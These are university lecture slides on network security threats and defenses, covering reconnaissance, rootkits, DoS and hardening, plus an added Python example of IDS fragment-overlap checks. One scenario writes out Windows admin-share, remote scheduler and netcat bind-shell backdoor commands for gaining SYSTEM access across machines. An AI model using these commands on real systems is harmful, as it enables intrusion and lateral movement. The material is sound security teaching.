INLS 578 Network Security March 26, 2008


Network Security

April 1, 2009

Disclaimer/AUP Review


Kevin Lanning, MSIS GSEC CISSP
Information Security Office
UNC-Chapel Hill

Sources: Sans.org courses 401, 504 and 508; Isc2.org CBK



Information Security Triad

Policy / Networking

- Availability - the network as a key asset. VOIP and wireless
- Integrity - transmitted data must not contain errors
- Confidentiality - protection of sensitive information in transit


The Network

(Cartoon: Gary Larson, The Complete Far Side)

Threats

Use of the network to carry out attacks

- Reconnaissance
  - White, grey and black box
  - Google hacking - open positions, contact lists, key staff, employee websites, design docs - examples
  - DNS interrogation, zone transfer - dig or nslookup
  - Whois
- Scanning/OS fingerprinting
  - Active - Nessus, nmap, Cheops network mapper with GUI, using the TTL field of the IP header
  - Passive
- Password cracking - brute force, dictionary, LANMAN
- Intrusion and covering the tracks - patching, log edits, laying low, listening



Threats

Use of the network to carry out attacks (cont'd)

- Maintaining control - Netcat, cron, backdoors
- Reverse WWW shell - uses port 80 outbound for the external connection. The shell runs on the host with input from the external system. Called "shoveling a UI". FW scope
- Malware distribution
  - Remote control - Radmin, Dameware, Sub7, SSH
  - Worms - morphing to functional equivalents but with a different code base = signature countermeasures
  - Botnets - via worms, attachments, bundled with software, browser exploits - solves the scaling problem
    - IRC controls most common


Threats

Sniffing and snooping

- Hubs vs. switches
- Fiber
- Wireless - WEP, WPA, 802.11i/WPA2 - SSL VPNs? Ghost in the AP
- Credential replay - tcpreplay
- Cable - segment sniffing - NIC in promiscuous mode

Attack against the network itself

- Denial of service
- Attacks against protocols - half-open TCP connections; BGP: YouTube down due to a specific route published by Pakistan - Arbor Networks
- Own the network with credentials


Threats & Risks

- Attacks using encryption - mask malicious code
- Zero day exploits - solution unknown to vendor and public.
- Vulnerable code - buffer overflows = not checking buffer sizes before moving things around in memory; goal = overwrite the instruction pointer and thus overwrite with what you want to execute
- Remote access - PDAs, laptops, unencrypted
- Covert channels - Stego, IPID field data transfer
  http://firstmonday.org/htbin/cgiwrap/bin/ojs/index.php/fm/article/view/528/449



Threats & Risks

End Users

- Messaging/browsing
- Social engineering/Phishing
- Weak protocols - telnet, rsh, X11, ftp




Threats & Risks

- IP address spoofing - hping
- ARP cache poisoning - gratuitous ARP
- Session hijacking - sniffing and spoofing - man-in-the-middle - ettercap
- Source routing - source specifies each router
- DNS cache poisoning
- Replay attacks - netcat, tcpreplay


Threats & Risks

- Bots - application level Trojan Horses and backdoors which SCALE.
- Backdoors - bypass normal security controls. Netcat listener, tini (3 KB) - push it in a buffer overflow?
- Ethernet card - firmware malware. Wireless?
- BIOS or CPU microcode level rootkits? http://www.packetstormsecurity.nl/0407-exploits/OpteronMicrocode.txt
- Rootkits - thousands of them
  - User mode - critical OS components replaced. Hacker Defender
  - Kernel mode - Truly evil. Kernel altered.

Threats & Risks

Rootkits - LRK

One example of a rootkit for Unix = LRK

- LRK - /bin/login is altered to allow attacker root access.
- Normal accounting is bypassed (who) & change of root has no impact on the backdoor.
- Encrypted remote access via sshd.
- Ethernet in promiscuous mode. Trojan version of ifconfig hides the PROMISC flag.
- Several programs are replaced with new versions so that any non-root user who runs one of the replaced apps with a command that includes the backdoor password in an argument is immediately elevated to root.
- A replacement for ps hides the attacker's processes.
- A replacement for killall ensures that the attacker's processes cannot be killed.
- Crontab is modified so that scheduled attacker processes do not show in cron config files.
- Netstat is altered to never show ports being used by the intruder.
- ls and find are altered to never show the attacker's files.
- du is altered to avoid showing the disk usage of the attacker's files.
- syslogd is modified to hide events associated with the intrusion.
- Fix tool returns "last modified" dates to the originals, including the CRC checksum of programs.

Trends

- Anti-malware tools only catching a minority
  - Repackaging
  - Encoding
  - Morphing malware - same function but with a different code base
  - Firewalling of malware
- Multi-exploit & multi-platform worms (Nimda had 12 = buffer overflows, browser exploits, etc.)



Trends

- More application layer attacks - web (WGET - *NIX and Windows; CURL - PERL tool for constructing web requests and automated harvesting)
- PHP #1 application attack at UNC-CH
- SQL injection attacks via web
- Click, drag and drop hacker tools - Metasploit 3.0, scale the growth
- Hacking for profit, organized crime involved
- Lower diversity results in faster spread


Intrusion Prevention Stats

(Chart: Attacks per Month for 2008, Jan through Dec, y-axis 0 to 6,000,000 attacks; series IPS-Total Attacks and IPS-Blocked Attacks.)
Defenses/Countermeasures

- Know your environment - bus, gov, edu
- Know where the valuable stuff exists
- Network Design for Defense in Depth
  - Routing - choice of protocols, source routing
  - Split DNS
  - Out of band network for availability
  - Firewalls
    - Packet filtering
    - Stateful
    - Proxy
  - DMZ - web, db
  - RFC 1918 - non-routable addresses

Defenses/Countermeasures

- Secure protocols - use for good OR evil
  - IPSEC
  - SSL
  - SSH
- Passwords = security 101
- Intrusion Protection
  - Network Intrusion Detection Sensors - tiny fragment = reassembly buffers = cd /etc/sha, fragment overlap
  - HD Moore "Thermoptic Camouflage" = OS dependent
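The tiny-fragment and fragment-overlap problems named under Network Intrusion Detection Sensors, worked as the detection logic a sensor should apply (an added example, not from the slides or the SANS material; the 20-byte threshold, the fragment model and the sample datagram are assumptions constructed for it):

```python
# Added example (not from the slides): anomaly flags an IDS sensor should
# raise for tiny first fragments and overlapping fragments, instead of
# silently guessing how the target host will reassemble them.
from typing import Dict, List, Tuple

Fragment = Tuple[int, bytes]  # (byte offset within the datagram, payload)

# Assumed threshold: a first fragment shorter than a 20-byte TCP header
# splits the header, so a sensor inspecting only the first fragment
# cannot match its port- or flag-based rules.
MIN_FIRST_FRAGMENT = 20


def reassemble(frags: List[Fragment], policy: str) -> bytes:
    """Rebuild the payload keeping the first or the last copy of each
    overlapping byte. Hosts differ on this, so a sensor that assumes the
    wrong policy inspects different bytes than the target executes."""
    buf: Dict[int, int] = {}
    for off, data in sorted(frags, key=lambda f: f[0]):
        for i, byte in enumerate(data):
            pos = off + i
            if policy == "first" and pos in buf:
                continue
            buf[pos] = byte
    return bytes(buf[p] for p in sorted(buf))


def analyze_fragments(frags: List[Fragment]) -> Dict[str, bool]:
    """Flag a tiny first fragment, any overlap, and overlaps whose bytes
    disagree (ambiguous: worth an alert in its own right)."""
    ordered = sorted(frags, key=lambda f: f[0])
    seen: Dict[int, int] = {}
    flags = {"tiny_first": False, "overlap": False, "ambiguous": False}
    if ordered and ordered[0][0] == 0 and len(ordered[0][1]) < MIN_FIRST_FRAGMENT:
        flags["tiny_first"] = True
    for off, data in ordered:
        for i, byte in enumerate(data):
            pos = off + i
            if pos in seen:
                flags["overlap"] = True
                if seen[pos] != byte:
                    flags["ambiguous"] = True
            seen[pos] = byte
    return flags


# Constructed sample: an 8-byte first fragment, then two fragments that
# overlap at offsets 8-15 and disagree about what the host will see.
SAMPLE_FRAGMENTS: List[Fragment] = [
    (0, b"GET /ind"), (8, b"ex.html "),
    (8, b"ex.php  "), (16, b"HTTP/1.0"),
]
```

Running both policies over the sample shows why the flags matter: a first-wins sensor sees a request for index.html while a last-wins host serves index.php.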


- Anti-virus, spyware, malware - http://secunia.com/gfx/Secunia_Exploit-vs-AV_test-Oct-2008.pdf
- HIDS, HIPS, "End Point" protection


Defenses/Countermeasures

Secure Administration

- Harden public facing systems such as DNS: split brain DNS, zone transfers only for specified systems
- Don't allow insecure protocols, or scope them - telnet, ftp
- Force password changes often
- Auth/Auth
- Group policy
- Bastion Hosts - systems hardened to withstand attack
- Build a DMZ - web/db
- Separate logging server


Defenses/Countermeasures

Host Hardening

- File integrity checkers - tripwire
- Defense in Depth
- Only enable needed services - reduce attack surface
- Check for listening ports and open files - netstat -na and lsof -i
- What has ports open - tcpview
- Profile system at build
- Patch, patch, patch
- Offline or firewalled build
- Special purpose systems - lower privs - VMs, Deep Freeze
- Reduced privs
- Log management - write once media for logging
- Vulnerability management - demo


Defenses/Countermeasures

- Use secure packages and versions
- Apache mod_security
- Exec Shield -- http://en.wikipedia.org/wiki/Exec_Shield
- SELinux -- http://en.wikipedia.org/wiki/SE_Linux
- Windows hardening and get rid of NT 4/2000
- Solaris 10
- NSA hardening guides http://www.nsa.gov/snac/downloads_redhat.cfm?MenuID=scg10.3.1.1


Defenses/Countermeasures

Encryption

- Symmetric key - single key for encryption & decryption
  - Fast
  - Secure distribution of the key is an issue
- PKI - Public Key Infrastructure
  - Computer users authenticate to each other without prior contact. A message encrypted with the recipient's public key can only be decrypted with the corresponding private key
  - Digital signature - a message signed with the private key can be verified by anyone with the public key
  - Certificate authority or web of trust model
  - Key exchange is secure
  - Slow
- Hash functions or digests - input of any length with a fixed length output = integrity check
  http://upload.wikimedia.org/wikipedia/commons/6/6b/Hash_function_long.svg


Defenses/Countermeasures

Insiders

- Logging and auditing
- Access controls
  - Least privilege
  - Separation of duties - escalation
- Administrative controls
  - Mandatory vacation
  - Job rotation


Real Life Scenarios

!Careful with the following:

- Distributed Denial of Service
- Imagine an organization with the same local acct across all critical systems
- Web-based banking applications
- Port 80 authentication
- IPS with false CRC but doesn't reset
- Take out the competition



Real Life Scenarios

Distributed Denial of Service

Scenario:
- Gambling site
- Threat of DDOS

Strategies to counter?

Real Life Scenarios

Extracted from SANS.org 504 with Ed Skoudis

Same local acct across all Windows systems

- Mount target C$ share and assign next available drive letter:
  C:\>net use * \\[target_IP]\C$ [admin pwd] /u:[admin user name]
- Start Task Scheduler
  C:\>sc \\[target_IP] start schedule
- Check local time on target
  C:\>net time \\[target_IP]

Real Life Scenarios

Same local acct across all Windows systems

- Create a batch file with the command to run
  C:\>notepad backdoor.bat
  C:\>\test\netcat\nc.exe -l -p 2222 -e cmd.exe
- Move Netcat and backdoor.bat to the target
- Schedule the .bat to run
- Use Netcat to connect
  C:\>nc target_IP 2222
- Now have full, command-line access with SYSTEM privileges
- Now scale it!


Real Life Scenarios

Imagine bankapp_inlsdemo.com

- Must be accessible from everywhere
- Have no control over hosts
- How
  - Different errors for valid vs. not valid ID
  - Low, slow brute force
  - Google hacking
  - From where? Use the botnet
  - Scope out account lockouts - pattern?


Real Life Scenarios

Port 80 authentication to a web site without firewall scoping

- Remote connection from wireless or cable
- Interception of traffic
- Google hacking
- Same password for other Apps
- Intruder breaks into other App

Real Life Scenarios

Remove the competition

- Smurf - spoof the source (use the victim's address as the source) of a ping to a network's broadcast address. The spoofed system gets flooded with replies, taking it out of the mix.
- SYN floods - half-open connections consume resources. Difficult to counter if highly distributed. Increase the connection queue and time out half-opens. Shorten timeouts?


Real Life Scenarios

Imagine you are a developer at a start-up IPS company. Everybody needs your services and your company could go $public$

- Real time action is the benefit
- Must be fast
- Hacker exploit?
- Reset with bad checksum?
- Recalcs???


Real Life Scenarios

Storm worm is a good example of many things

Check it out: http://en.wikipedia.org/wiki/Storm_Worm


Take Aways

- Hacker community is very well organized. We must organize too!
- Guard network credentials
- Hardening guides (see nsa.gov, sans.org, redhat.com, etc.)
- Vendor recommendations, but defense in depth against the zero day exploit
- Tools, tools, tools
- Host-based IDS/IPS
- End user education - they have the power
- Exciting time to be in security
- Host-based firewall - scope

Take Away and References

Every day brings news and no one is immune. We must collaborate.

References

- www.honeynet.org
- Sans.org (see top 20 and isc.sans.org)
- Megasecurity.org (see radmin tools list)
- http://www.uscert.gov/
- Vulnerabilities: http://www.milw0rm.com/ and http://secunia.com/
- Microsoft: blogs.technet.com/msrc/
- CISecurity: http://www.cisecurity.org/benchmarks.html